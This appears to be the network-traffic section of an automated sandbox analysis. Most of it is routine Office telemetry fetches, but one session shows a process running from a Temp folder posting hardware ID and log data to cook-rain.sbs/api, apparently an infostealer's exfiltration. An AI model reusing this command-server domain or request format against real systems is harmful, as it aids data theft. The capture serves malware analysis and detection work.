                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111039Z-r1d97b99577xdmfxhC1TEBqbhg0000000200000000002ha2
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:39 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            96192.168.2.44983813.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:39 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:39 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:39 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 1389
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BE10A6BC1"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 610e5600-501e-005b-46b5-3bd7f7000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111039Z-r1d97b99577dd2gchC1TEBz5ys0000000a30000000008yv2
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:39 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            97192.168.2.44984013.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:40 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:40 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:40 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 1352
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BE9DEEE28"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: d85dbe48-801e-0067-109a-3bfe30000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111040Z-r1d97b995777mdbwhC1TEBezag0000000a9g0000000055bb
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:40 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            98192.168.2.44984113.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:40 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:41 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:40 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 1405
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BE12B5C71"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 538e08fd-a01e-0032-4b7d-3b1949000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111040Z-1777c6cb7549j9hhhC1TEBzmcc0000000ay00000000077a1
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:41 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            99192.168.2.44984213.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:41 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:41 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:41 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 1368
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BDDC22447"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 110996dd-801e-0048-7360-3bf3fb000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111041Z-178bfbc474bw8bwphC1NYC38b4000000019g000000002dte
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:41 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            100192.168.2.44984513.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:41 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:41 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:41 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 1364
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BE1223606"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: fce879e9-f01e-0052-0d66-3b9224000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111041Z-178bfbc474bw8bwphC1NYC38b4000000018g000000004th6
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:41 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            101192.168.2.44984313.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:41 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:41 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:41 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 1401
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BE055B528"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 3272c5ec-601e-003d-7d76-3b6f25000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111041Z-1777c6cb754gc8g6hC1TEB966c0000000ay000000000ckua
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:41 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            102192.168.2.449847188.114.96.34437968C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:41 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=6AIJ2DRMOI4FQ5N6P
                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                            Content-Length: 20437
                                                                                                                                                                                                                                                                                                            Host: cook-rain.sbs
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:41 UTC15331OUTData Raw: 2d 2d 36 41 49 4a 32 44 52 4d 4f 49 34 46 51 35 4e 36 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 39 31 42 39 43 46 37 31 41 31 38 31 43 31 37 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 0d 0a 2d 2d 36 41 49 4a 32 44 52 4d 4f 49 34 46 51 35 4e 36 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 36 41 49 4a 32 44 52 4d 4f 49 34 46 51 35 4e 36 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66
                                                                                                                                                                                                                                                                                                            Data Ascii: --6AIJ2DRMOI4FQ5N6PContent-Disposition: form-data; name="hwid"391B9CF71A181C1763CFCF7E6C45F838--6AIJ2DRMOI4FQ5N6PContent-Disposition: form-data; name="pid"3--6AIJ2DRMOI4FQ5N6PContent-Disposition: form-data; name="lid"LOGS11--LiveTraf
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:41 UTC5106OUTData Raw: 00 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03
                                                                                                                                                                                                                                                                                                            Data Ascii: `M?lrQMn 64F6(X&7~`aO
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:42 UTC992INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:42 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=5gc2kuq5sk4u9ssh7sgq3g39e8; expires=Mon, 17-Mar-2025 04:57:21 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LeQDLqoeo%2BGyqVsftEepaMljHpzuyzZQ3YS%2B4xBBWrlY%2Bhl%2BUYMAUwXu3%2FkUrjNGF8MiwldXOk0%2Be4DujKWwQ3CjWNsz8f34JOt8AMWyS40fIJesTZ%2BwQ5YntAdpEAEb"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                                                                            CF-RAY: 8e603c185a360f46-EWR
                                                                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1698&sent=14&recv=26&lost=0&retrans=0&sent_bytes=2829&recv_bytes=21395&delivery_rate=1671436&cwnd=241&unsent_bytes=0&cid=af80b2066ca5b216&ts=785&x=0"
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:42 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: eok 8.46.123.75
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            103192.168.2.44984813.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:42 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:43 UTC494INHTTP/1.1 200 OK
